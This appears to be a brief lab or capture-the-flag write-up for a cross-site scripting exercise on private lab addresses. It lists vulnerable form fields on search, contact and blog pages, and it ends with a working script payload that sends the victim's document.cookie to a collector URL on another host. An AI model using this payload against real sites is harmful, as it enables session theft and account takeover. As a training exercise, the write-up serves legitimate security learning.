🖼Description

http://**192.168.99.10/** hosted address

username: attacker

password: attacker

http://192.168.99.11/get.php receives stolen cookies

📊Goals

✔️ steal the administrator's cookies via XSS

✔️ access admin page: admin.php

🧰Tools

• brain and browser!

💡 Steps

1️⃣ Find all the XSS points

2️⃣ Steal admin session cookies

🏁 MY Solution

🔺 Find all the XSS points

/search.php

search

/contact.php

name

email

subject

/blog.php

object

comment

🔺 Steal admin session cookies

<script>
var i = new Image();
i.src="<http://192.168.99.11/get.php?cookies=>"+document.cookie;
</script>